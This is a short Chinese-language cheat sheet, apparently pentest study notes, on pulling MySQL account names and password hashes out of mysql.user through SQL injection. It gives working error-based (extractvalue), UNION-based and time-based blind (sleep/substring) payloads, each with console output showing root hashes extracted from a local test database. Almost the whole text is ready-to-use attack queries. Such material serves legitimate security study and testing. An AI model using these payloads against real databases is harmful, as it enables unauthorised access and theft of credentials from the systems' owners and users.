0x00 记忆方式

select host, user, password from mysql.user

  1. mysql> select host, user, password from mysql.user;
  2. +-----------+------+-------------------------------------------+
  3. | host      | user | password                                  |
  4. +-----------+------+-------------------------------------------+
  5. | localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  6. | 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. | ::1       | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  8. +-----------+------+-------------------------------------------+
  9. 3 rows in set (0.00 sec)

0x01 爆错注入获取

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1))

  1. mysql> select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1));
  2. ERROR 1105 (HY000): XPATH syntax error: '~localhost~root~*81F5E21E35407D8'

0x02 union联合注入获取

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

  1. # 演示数据
  2. mysql> select * from test;
  3. +------+------+------+---------+
  4. | id   | test | map  | content |
  5. +------+------+------+---------+
  6. |    1 | 1    | 1    | 1       |
  7. |    2 | 2    | 2    | 2       |
  8. |    3 | 3    | 3    | 3       |
  9. +------+------+------+---------+
  10. 3 rows in set (0.00 sec)
  1. # 显示列数
  2. mysql> select * from test where 1=2 union select 1,2,3,4;
  3. +------+------+------+---------+
  4. | id   | test | map  | content |
  5. +------+------+------+---------+
  6. |    1 | 2    | 3    | 4       |
  7. +------+------+------+---------+
  8. 1 row in set (0.00 sec)
  1. # 显示数据
  2. mysql> select * from test where 1=2 union select 1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),3,4;
  3. +------+-----------------------------------------------------------+------+---------+
  4. | id   | test                                                      | map  | content |
  5. +------+-----------------------------------------------------------+------+---------+
  6. |    1 | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | 3    | 4       |
  7. +------+-----------------------------------------------------------+------+---------+
  8. 1 row in set (0.00 sec)

0x03 盲注获取

  1. # 测试数据
  2. mysql> select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1;
  3. +-----------------------------------------------------------+
  4. | concat(0x7e,host,0x7e,user,0x7e,password)                 |
  5. +-----------------------------------------------------------+
  6. | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. +-----------------------------------------------------------+
  8. 1 row in set (0.00 sec)

读 mysql.user表第一条数据第一个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)=’~’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);
  2. Empty set (5.00 sec)

读 mysql.user表第一条数据第二个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)=’l’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);
  2. Empty set (5.00 sec)